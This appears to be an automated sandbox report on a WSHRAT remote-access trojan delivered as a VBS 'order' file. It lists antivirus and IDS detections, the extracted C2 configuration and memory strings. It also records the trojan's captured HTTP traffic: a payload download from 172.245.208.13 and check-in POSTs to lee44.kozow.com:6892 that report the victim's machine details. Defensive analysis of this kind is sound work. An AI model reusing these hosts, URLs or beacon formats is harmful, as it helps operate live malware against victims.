                            Source: http://lee44.kozow.com:6892/is-ready862 | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready13862-A4x | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready8076.amsi.csv | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readys | Avira URL Cloud: Label: phishing
                            Source: lee44.kozow.com | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyX | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyt | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready/h | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readye | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready20 | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyaras | Avira URL Cloud: Label: phishing
                            Source: http://172.245.208.13/wex/ggh.js | Avira URL Cloud: Label: malware
                            Source: http://lee44.kozow.com:6892/is-readyem32 | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com/14-4c59-bad8-9c31255dc46ah | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyzow.com:6892/is-readyP | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready-A4 | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready4 | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyadyEM | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready3 | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready-A4x | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready38638 | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyzow.com:6892/is-readys | Avira URL Cloud: Label: phishing
                            Source: C:\Users\user\AppData\Local\Temp\notepad.js | Avira: detection malicious, Label: JS/Dldr.G8
                            Source: amsi64_8076.amsi.csv | Malware Configuration Extractor: WSHRAT {"C2 url": "lee44.kozow.com", "Port": "6892", "Install folder": "%temp%"}
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | ReversingLabs: Detection: 68%
                            Source: ORDER-25013-67789543AX.vbs | Virustotal: Detection: 13%
                            Source: Submitted Sample | Neural Call Log Analysis: 99.8%
                            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
                            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 5_2_024FBA48

                            Networking

                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49743 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49729 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49729 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49728 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49728 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49730 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49738 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49738 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49740 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49740 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49727 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49742 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49733 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49742 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49725 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49725 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49735 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49746 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49746 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49731 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49734 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49731 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49741 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49741 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49747 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49730 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49718 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49718 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49726 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49760 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49739 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49760 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49739 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49734 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49756 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49717 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49735 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49756 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49717 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49726 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49744 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49744 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49737 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49737 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49750 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49750 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49733 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49753 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49727 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49759 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49762 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49743 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49754 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49759 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49753 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49762 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49755 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49747 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49755 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49761 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49761 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49754 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49758 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49751 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49758 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49751 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49752 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49752 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49745 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49745 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49732 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49749 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49732 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49749 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49748 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49748 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49757 -> 104.168.7.12:6892
                            Source: Network traffic | Suricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49757 -> 104.168.7.12:6892
                            Source: C:\Windows\System32\wscript.exe | Network Connect: 172.245.208.13 80
                            Source: C:\Windows\System32\wscript.exe | Network Connect: 104.168.7.12 6892
                            Source: Malware configuration extractor | URLs: lee44.kozow.com
                            Source: Initial file: aTVJlgQpMqQBNfSosmvtCHeYEVPjWxKwdJMSFtgOMZwAHcQMJOwYuPZTpwEPRgTPgTXDSAjzFghdKdQcFDaIBmCNjt.SaveToFile RqVkNIXqpwdYPrkNFCGodcZLGwUMauVxsxspiBLguBINHUuwrCLxoWBoQJdRnLPubffRyueDrZt, JpGYbxYZXAbQutWjTRgectuCiFfHDaRcJhTkOgfurqSrkncQyLCoySEPvEqVRQWwizGMamUmmlnmbCRvcPJrYddrcDoKpJc
                            Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 6892
                            Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 6892
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65
                            Source: global traffic | TCP traffic: 192.168.2.4:49717 -> 104.168.7.12:6892
                            Source: Joe Sandbox View | IP Address: 172.245.208.13
                            Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
                            Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
                            Source: global traffic | HTTP traffic detected:
                                GET /wex/ggh.js HTTP/1.1
                                Accept: */*
                                Accept-Language: en-ch
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: 172.245.208.13
                                Connection: Keep-Alive
                            Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.208.13 (this event is listed 50 times in the report)
                            Source: global traffic | HTTP traffic detected:
                                GET /wex/ggh.js HTTP/1.1
                                Accept: */*
                                Accept-Language: en-ch
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: 172.245.208.13
                                Connection: Keep-Alive
                            Source: global traffic | DNS traffic detected: DNS query: lee44.kozow.com
                            Source: unknown | HTTP traffic detected:
                                POST /is-ready HTTP/1.1
                                Accept: */*
                                user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 15/4/2025|JavaScript
                                Accept-Language: en-ch
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                Host: lee44.kozow.com:6892
                                Content-Length: 0
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                            Source: wscript.exe, 00000001.00000002.1345926232.000002BF13223000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345384983.000002BF114EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345841399.000002BF11775000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343432506.000002BF1152A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345634293.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343758832.000002BF114EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1338570705.000002BF137F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343866311.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345477649.000002BF11531000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1344503722.000002BF114EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1344240544.000002BF133A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343333967.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343941257.000002BF1152D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343716078.000002BF1152C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.208.13/wex/ggh.js
                            Source: wscript.exe, 00000001.00000003.1343432506.000002BF1152A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345477649.000002BF11531000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343941257.000002BF1152D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343716078.000002BF1152C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.208.13/wex/ggh.jsp.3
                            Source: wscript.exe, 00000003.00000003.1682858553.000001E9CD387000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com/14-4c59-bad8-9c31255dc46ah
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2597063240.000001F861F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready-A4
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready-A4x
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready/h
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready13862-A4x
                            Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD346000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready20
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready3
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready38638
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready4
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready6-A4x
                            Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD346000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready8076.amsi.csv
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready813S8R
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-ready862
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-readyL
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD319000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-readyO
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1683216538.000001E9CD33B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-readyParrs
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-readyV
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD319000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lee44.kozow.com:6892/is-readyX
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyadyEM
                            Source: wscript.exe, 00000003.00000003.1683216538.000001E9CD33B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyaras
                            Source: wscript.exe, 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readybe.TARM~1
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readye
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyem32
                            Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyl
